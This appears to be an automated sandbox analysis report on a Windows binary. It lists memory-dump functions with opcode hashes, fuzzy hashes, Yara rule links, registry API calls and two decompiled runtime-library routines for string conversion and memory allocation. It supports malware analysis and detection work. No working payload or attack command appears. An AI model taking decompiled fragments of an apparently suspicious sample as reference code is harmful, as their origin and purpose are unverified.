                                                                                                                                                  Function 0048A4D8, Relevance: 2.3, APIs: 1, Instructions: 764libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927390291.0000000000480000.00000040.00000001.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: befd5f50cb4f40b9f97a9b2833828a19becc101c7c31de2465a1ab76b234cd9a
                                                                                                                                                  • Instruction ID: 2b1fe95193be1cd97790ca9e9339a24058224d43f7f01a45eb5bb1f0af2957ab
                                                                                                                                                  • Opcode Fuzzy Hash: befd5f50cb4f40b9f97a9b2833828a19becc101c7c31de2465a1ab76b234cd9a
                                                                                                                                                  • Instruction Fuzzy Hash: C5621E30E006188FDB24EF78D85569DB7F2AF89304F1089AAD549AB350EF789D85CF51
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0086B278, Relevance: 1.9, APIs: 1, Instructions: 396COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.931860481.0000000000860000.00000040.00000001.sdmp, Offset: 00860000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 08ed5eb7285f1decefd85174a8664435437578145673aad4cafe48319084f9a2
                                                                                                                                                  • Instruction ID: b43e6127a706449a1c76cd6bef8da10c6dae6b5162b97b6e8563c86c76d8ea55
                                                                                                                                                  • Opcode Fuzzy Hash: 08ed5eb7285f1decefd85174a8664435437578145673aad4cafe48319084f9a2
                                                                                                                                                  • Instruction Fuzzy Hash: 41F12830A002188FDB14DFA9C845B9DBBF2FF94308F168569E505EB3A5DB74E985CB81
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0048CCF8, Relevance: 1.3, Instructions: 1325COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927390291.0000000000480000.00000040.00000001.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 777c1ce7c8af50e838af9ca3baa3f7f947ada36320476d00b8e257f2169a71ea
                                                                                                                                                  • Instruction ID: bd1f9c75ac6069fbf237d694b7b8fd612953475e7c6c8554f37d2805c59826b1
                                                                                                                                                  • Opcode Fuzzy Hash: 777c1ce7c8af50e838af9ca3baa3f7f947ada36320476d00b8e257f2169a71ea
                                                                                                                                                  • Instruction Fuzzy Hash: 99B27B34E012048FCB24EFB8D4886AEB7B2EF89315F14896AD416DB395DB39DC42CB55
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00480D91, Relevance: .9, Instructions: 910COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927390291.0000000000480000.00000040.00000001.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1bf5f53779ae6e46e244fd6e31dd9ff5608aaa3be594670784c41d0508a5abfc
                                                                                                                                                  • Instruction ID: 6a312c2c36cd6fb5c27e0ce663b9b5d090430c48adcd8437290137f443d5fe08
                                                                                                                                                  • Opcode Fuzzy Hash: 1bf5f53779ae6e46e244fd6e31dd9ff5608aaa3be594670784c41d0508a5abfc
                                                                                                                                                  • Instruction Fuzzy Hash: FB826D30A00609DFCB14EF68C584AAEBBF6BF49304F15895AE805DB7A1D738EC46CB55
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00480040, Relevance: .9, Instructions: 899COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927390291.0000000000480000.00000040.00000001.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f426f66b32792e7adaafdc0f1f3c1a9753074f778b491e120421831e47f7a4ff
                                                                                                                                                  • Instruction ID: cde2219245e78008eb48f27441a3d462ac3e4f8bcf57607b8625974378bb6b65
                                                                                                                                                  • Opcode Fuzzy Hash: f426f66b32792e7adaafdc0f1f3c1a9753074f778b491e120421831e47f7a4ff
                                                                                                                                                  • Instruction Fuzzy Hash: B5728370A102199FDB54EFA4D844AAEBBF2FF89304F14846AE805EB351DB38EC45CB55
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0049F220, Relevance: .9, Instructions: 863COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927461711.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 118c60156f65bc455df062f5f596944b1f2350443c560d23780eb46e84c16676
                                                                                                                                                  • Instruction ID: e71e2f3abf710b6975d0ac8585d16955c4b4bc614b6711f554e24476b38b7592
                                                                                                                                                  • Opcode Fuzzy Hash: 118c60156f65bc455df062f5f596944b1f2350443c560d23780eb46e84c16676
                                                                                                                                                  • Instruction Fuzzy Hash: 7F629030B042149FDF14ABB8D8957AE7BA2EB85314F14887AE405DB391DF3CDC468B99
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00818478, Relevance: .8, Instructions: 773COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.931737670.0000000000810000.00000040.00000001.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: fccf8ff380a72178ddd958b385f3d816c14d7d69a4b0e13c3cc474a57b9b3e39
                                                                                                                                                  • Instruction ID: 7bf325c2f4d8c45a385c9f9e2295dea52caad7acac30ab1bddde8de6d93e0c81
                                                                                                                                                  • Opcode Fuzzy Hash: fccf8ff380a72178ddd958b385f3d816c14d7d69a4b0e13c3cc474a57b9b3e39
                                                                                                                                                  • Instruction Fuzzy Hash: 5D42D230B002249FEB149B68D856BEEBAA7FF95314F148469E009EF785CF78DC858791
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00812FC8, Relevance: .8, Instructions: 771COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.931737670.0000000000810000.00000040.00000001.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 968d5724924466c1c70f960b9280716fde459639df19488d54c116d2a95aca77
                                                                                                                                                  • Instruction ID: 66925c6c83e7a8484df0cd7330bca223b165c8d69bc7fb4b31eebdf8883ec0eb
                                                                                                                                                  • Opcode Fuzzy Hash: 968d5724924466c1c70f960b9280716fde459639df19488d54c116d2a95aca77
                                                                                                                                                  • Instruction Fuzzy Hash: 8B625B74A002248FDB14EB78D8597ADBBB2FF88314F1485A9D409EB344EF399D818F95
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00813028, Relevance: .8, Instructions: 757COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.931737670.0000000000810000.00000040.00000001.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 60b526ca4c36150d74646a70924ce7f167a254439a70c5903cafae75538aaa19
                                                                                                                                                  • Instruction ID: b065dcd40f89eff3b61ea27d679e6f3430b1d79b3cb4c991f81b1f62ebd931e4
                                                                                                                                                  • Opcode Fuzzy Hash: 60b526ca4c36150d74646a70924ce7f167a254439a70c5903cafae75538aaa19
                                                                                                                                                  • Instruction Fuzzy Hash: 67624B74A002248FDB14EB78D8597ADBBB2FF88314F1485A9D409EB344EF399D818F95
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00814824, Relevance: .7, Instructions: 669COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.931737670.0000000000810000.00000040.00000001.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4ecbf160ce7b4f1ab91bdea53f4e274c452edda75471a5893a783bcde6a101bf
                                                                                                                                                  • Instruction ID: ad3c9cbe4ad2a097ce5aae6b4580343893f90cb312b704d73c89e4372524c419
                                                                                                                                                  • Opcode Fuzzy Hash: 4ecbf160ce7b4f1ab91bdea53f4e274c452edda75471a5893a783bcde6a101bf
                                                                                                                                                  • Instruction Fuzzy Hash: FB429D30A00658CFEB64DBA8C8547ADBBA6EF95304F14C5A9D009EF386DB78DC85CB51
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00811560, Relevance: .6, Instructions: 621COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.931737670.0000000000810000.00000040.00000001.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1fbbbf19fe791514785d8b33a99b43e8837560155c6417ad2b16dc7c99fb49d1
                                                                                                                                                  • Instruction ID: 6091f79fc3229edaba6d37ef1132606faae4122f67b9e0ec4dae163e9683331c
                                                                                                                                                  • Opcode Fuzzy Hash: 1fbbbf19fe791514785d8b33a99b43e8837560155c6417ad2b16dc7c99fb49d1
                                                                                                                                                  • Instruction Fuzzy Hash: 5B326A34A002188FCB54EBB8D8497ADB7F6BF84304F1484A9D509DB395DF389D86CB91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00498E00, Relevance: .6, Instructions: 553COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927461711.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: f685aa52030cf0f2e84d080c5c78b5707167352b1fd76f9a698bb3fd155b19eb
                                                                                                                                                  • Instruction ID: 6032415ed833a14afe23fe272d77ea5d7a2c644f08d19ca94ef3d7f6dc45f3f3
                                                                                                                                                  • Opcode Fuzzy Hash: f685aa52030cf0f2e84d080c5c78b5707167352b1fd76f9a698bb3fd155b19eb
                                                                                                                                                  • Instruction Fuzzy Hash: 0C229F70A042189FDB14DBB8C854BAEBBF2AF99304F15847AE405EB395DB38EC418B55
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 004895F8, Relevance: .4, Instructions: 437COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927390291.0000000000480000.00000040.00000001.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 6fe43c76b59ad876de733a682d98893966c06a307d1f9d9c4eb4dcf0acbe69d5
                                                                                                                                                  • Instruction ID: b078d309e69a10d1c44684c008ccbae0914e6788cb55330511d16256296411a5
                                                                                                                                                  • Opcode Fuzzy Hash: 6fe43c76b59ad876de733a682d98893966c06a307d1f9d9c4eb4dcf0acbe69d5
                                                                                                                                                  • Instruction Fuzzy Hash: 49E1B434B006458FCB14EFB8E4846AEBBB2EF85304F18886AE415E7391DB39EC45CB55
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0049D988, Relevance: .4, Instructions: 396COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927461711.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 7fdbf94ffc35886c7089f30ae887a135050d1c1fdd4b054fa79cca8afc134e95
                                                                                                                                                  • Instruction ID: 8244c3589fef91e0bd265251ed74ed50cdb61a9dbf95203db118c8e0ea9974d0
                                                                                                                                                  • Opcode Fuzzy Hash: 7fdbf94ffc35886c7089f30ae887a135050d1c1fdd4b054fa79cca8afc134e95
                                                                                                                                                  • Instruction Fuzzy Hash: F0D1BF70B006249BEB58AB74985976E7AE3AFD5744F14C43DE006AF780DF7CAC028799
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 004018F0, Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                  			E004018F0(void* __eax, char** __ecx, void* __edx, char* _a4, int _a8) {
				void* __ebx;
				void* __ebp;
				signed int _t12;
				void* _t21;
				int _t25;
				void* _t30;
				int _t32;
				char* _t35;

				_t21 = __edx;
				_t35 = _a4;
				_t17 = __ecx;
				if(_t35 != 0) {
					_t25 = lstrlenA(_t35) + 1;
					E004017E0(_t17, _t21, _t35, _t17, _t25,  &(_t17[1]), 0x80);
					_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t25); // executed
					asm("sbb esi, esi");
					_t30 =  ~_t12 + 1;
					if(_t30 != 0) {
						_t12 = GetLastError();
						if(_t12 == 0x7a) {
							_t32 = MultiByteToWideChar(_a8, 0, _t35, _t25, 0, 0);
							E004017E0(_t17, _a8, _t35, _t17, _t32,  &(_t17[1]), 0x80);
							_t12 = MultiByteToWideChar(_a8, 0, _t35, _t25,  *_t17, _t32);
							asm("sbb esi, esi");
							_t30 =  ~_t12 + 1;
						}
						if(_t30 != 0) {
							_t12 = E00401030();
						}
					}
					return _t12;
				} else {
					 *__ecx = _t35;
					return __eax;
				}
			}











                                                                                                                                                  0x004018f0
                                                                                                                                                  0x004018f2
                                                                                                                                                  0x004018f6
                                                                                                                                                  0x004018fa
                                                                                                                                                  0x00401917
                                                                                                                                                  0x0040191a
                                                                                                                                                  0x0040192f
                                                                                                                                                  0x00401939
                                                                                                                                                  0x0040193b
                                                                                                                                                  0x0040193e
                                                                                                                                                  0x00401940
                                                                                                                                                  0x00401949
                                                                                                                                                  0x0040195e
                                                                                                                                                  0x0040196b
                                                                                                                                                  0x00401980
                                                                                                                                                  0x0040198a
                                                                                                                                                  0x0040198c
                                                                                                                                                  0x0040198c
                                                                                                                                                  0x0040198f
                                                                                                                                                  0x00401991
                                                                                                                                                  0x00401991
                                                                                                                                                  0x0040198f
                                                                                                                                                  0x0040199a
                                                                                                                                                  0x004018fc
                                                                                                                                                  0x004018fc
                                                                                                                                                  0x00401900
                                                                                                                                                  0x00401900

                                                                                                                                                  APIs
                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00401906
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
                                                                                                                                                  • GetLastError.KERNEL32 ref: 00401940
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorLastlstrlen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3322701435-0
                                                                                                                                                  • Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                  • Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
                                                                                                                                                  • Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
                                                                                                                                                  • Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0040AF66, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                  			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed int _v4;
				signed int _v16;
				signed int _v40;
				void* _t14;
				signed int _t15;
				intOrPtr* _t21;
				signed int _t24;
				void* _t28;
				void* _t39;
				void* _t40;
				signed int _t42;
				void* _t45;
				void* _t47;
				void* _t51;

				_t40 = __edi;
				_t28 = __ebx;
				_t45 = _t51;
				while(1) {
					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = E0040D2E3(_a4);
					__eflags = _t15;
					if(_t15 == 0) {
						__eflags =  *0x423490 & 0x00000001;
						if(( *0x423490 & 0x00000001) == 0) {
							 *0x423490 =  *0x423490 | 0x00000001;
							__eflags =  *0x423490;
							E0040AEFC(0x423484);
							E0040D2BD( *0x423490, 0x41a704);
						}
						E0040AF49( &_v16, 0x423484);
						E0040CD39( &_v16, 0x420fa4);
						asm("int3");
						_t47 = _t45;
						_push(_t47);
						_push(0xc);
						_push(0x420ff8);
						_t19 = E0040E1D8(_t28, _t40, 0x423484);
						_t42 = _v4;
						__eflags = _t42;
						if(_t42 != 0) {
							__eflags =  *0x4250b0 - 3;
							if( *0x4250b0 != 3) {
								_push(_t42);
								goto L16;
							} else {
								E0040D6E0(_t28, 4);
								_v16 = _v16 & 0x00000000;
								_t24 = E0040D713(_t42);
								_v40 = _t24;
								__eflags = _t24;
								if(_t24 != 0) {
									_push(_t42);
									_push(_t24);
									E0040D743();
								}
								_v16 = 0xfffffffe;
								_t19 = E0040B70B();
								__eflags = _v40;
								if(_v40 == 0) {
									_push(_v4);
									L16:
									__eflags = HeapFree( *0x4234b4, 0, ??);
									if(__eflags == 0) {
										_t21 = E0040BFC1(__eflags);
										 *_t21 = E0040BF7F(GetLastError());
									}
								}
							}
						}
						return E0040E21D(_t19);
					} else {
						continue;
					}
					L19:
				}
				return _t14;
				goto L19;
			}

















                                                                                                                                                  0x0040af66
                                                                                                                                                  0x0040af66
                                                                                                                                                  0x0040af69
                                                                                                                                                  0x0040af7d
                                                                                                                                                  0x0040af80
                                                                                                                                                  0x0040af88
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040af73
                                                                                                                                                  0x0040af79
                                                                                                                                                  0x0040af7b
                                                                                                                                                  0x0040af8c
                                                                                                                                                  0x0040af98
                                                                                                                                                  0x0040af9a
                                                                                                                                                  0x0040af9a
                                                                                                                                                  0x0040afa3
                                                                                                                                                  0x0040afad
                                                                                                                                                  0x0040afb2
                                                                                                                                                  0x0040afb7
                                                                                                                                                  0x0040afc5
                                                                                                                                                  0x0040afca
                                                                                                                                                  0x0040afd0
                                                                                                                                                  0x0040aec2
                                                                                                                                                  0x0040b6b5
                                                                                                                                                  0x0040b6b7
                                                                                                                                                  0x0040b6bc
                                                                                                                                                  0x0040b6c1
                                                                                                                                                  0x0040b6c4
                                                                                                                                                  0x0040b6c6
                                                                                                                                                  0x0040b6c8
                                                                                                                                                  0x0040b6cf
                                                                                                                                                  0x0040b714
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b6d1
                                                                                                                                                  0x0040b6d3
                                                                                                                                                  0x0040b6d9
                                                                                                                                                  0x0040b6de
                                                                                                                                                  0x0040b6e4
                                                                                                                                                  0x0040b6e7
                                                                                                                                                  0x0040b6e9
                                                                                                                                                  0x0040b6eb
                                                                                                                                                  0x0040b6ec
                                                                                                                                                  0x0040b6ed
                                                                                                                                                  0x0040b6f3
                                                                                                                                                  0x0040b6f4
                                                                                                                                                  0x0040b6fb
                                                                                                                                                  0x0040b700
                                                                                                                                                  0x0040b704
                                                                                                                                                  0x0040b706
                                                                                                                                                  0x0040b715
                                                                                                                                                  0x0040b723
                                                                                                                                                  0x0040b725
                                                                                                                                                  0x0040b727
                                                                                                                                                  0x0040b73a
                                                                                                                                                  0x0040b73c
                                                                                                                                                  0x0040b725
                                                                                                                                                  0x0040b704
                                                                                                                                                  0x0040b6cf
                                                                                                                                                  0x0040b742
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040af7b
                                                                                                                                                  0x0040af8b
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • _malloc.LIBCMT ref: 0040AF80
                                                                                                                                                    • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                    • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                    • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                  • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                                                                                                                    • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927182410.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.927267311.0000000000426000.00000040.00000001.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.927294895.000000000045A000.00000040.00000001.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1411284514-0
                                                                                                                                                  • Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                  • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                                                                                                                  • Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
                                                                                                                                                  • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0081D718, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.931737670.0000000000810000.00000040.00000001.sdmp, Offset: 00810000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: 4]F
                                                                                                                                                  • API String ID: 0-1284068322
                                                                                                                                                  • Opcode ID: d5f74e0d45176644a15591f807b12341448ab9a7cb4c11fa9c76e7f6a26930e7
                                                                                                                                                  • Instruction ID: 93879424de4526d6623ca552b9808d71aa6588f3df09b6f8982ce8d7c1157bbd
                                                                                                                                                  • Opcode Fuzzy Hash: d5f74e0d45176644a15591f807b12341448ab9a7cb4c11fa9c76e7f6a26930e7
                                                                                                                                                  • Instruction Fuzzy Hash: FC412372D047858FCB00CBB9D8447DEBBB0EF85314F14856AC449E7781DB789845CB91
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0049C8D0, Relevance: 2.0, APIs: 1, Instructions: 473COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927461711.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: db892e726bf47c0cff1c50a559ae75d4efdac02af2dc56a71f7d946cf83a392a
                                                                                                                                                  • Instruction ID: 69e421d11b615d0e699eb7614695076e21d6fe0da339440d81e8bc52dc3e4358
                                                                                                                                                  • Opcode Fuzzy Hash: db892e726bf47c0cff1c50a559ae75d4efdac02af2dc56a71f7d946cf83a392a
                                                                                                                                                  • Instruction Fuzzy Hash: 8FF19174B002049FDB04EBB8E4956AE7BE2AF89304F14857AE405DB395DF3DDD028BA5
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 0049EE38, Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927461711.0000000000490000.00000040.00000001.sdmp, Offset: 00490000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                  • Opcode ID: f168af02f3c2aa5f8de56d66f24547da604c0d128b033bcdbe0a9623e68fbc5a
                                                                                                                                                  • Instruction ID: 8b03561c4d6e009d4ce16f334fd0efaf899f5b20b0eef2a674cd14c960ca680b
                                                                                                                                                  • Opcode Fuzzy Hash: f168af02f3c2aa5f8de56d66f24547da604c0d128b033bcdbe0a9623e68fbc5a
                                                                                                                                                  • Instruction Fuzzy Hash: 5D916A30A002089BDF14EBB9D8557AE7AB2AF84304F14843AE406EB395DF7D9C46CB95
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00489DD8, Relevance: 1.6, APIs: 1, Instructions: 119registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,00000000), ref: 00489EF1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927390291.0000000000480000.00000040.00000001.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3660427363-0
                                                                                                                                                  • Opcode ID: a926f3070600fcf6fa70bcc9484e113598ba9b18486b2b9d9df5a7f4410989b4
                                                                                                                                                  • Instruction ID: 372a3bbe24e38e9aec3b60b8cb5a35d98b1a493918e0e2c846cb7e9cddb7f886
                                                                                                                                                  • Opcode Fuzzy Hash: a926f3070600fcf6fa70bcc9484e113598ba9b18486b2b9d9df5a7f4410989b4
                                                                                                                                                  • Instruction Fuzzy Hash: F84145B4E002489FCB10DFA9C884AAEBFF1AF48300F19846AE819AB351D7749C05CF54
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 00489BC4, Relevance: 1.6, APIs: 1, Instructions: 94registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,?,?), ref: 00489C78
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.927390291.0000000000480000.00000040.00000001.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Open
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 71445658-0
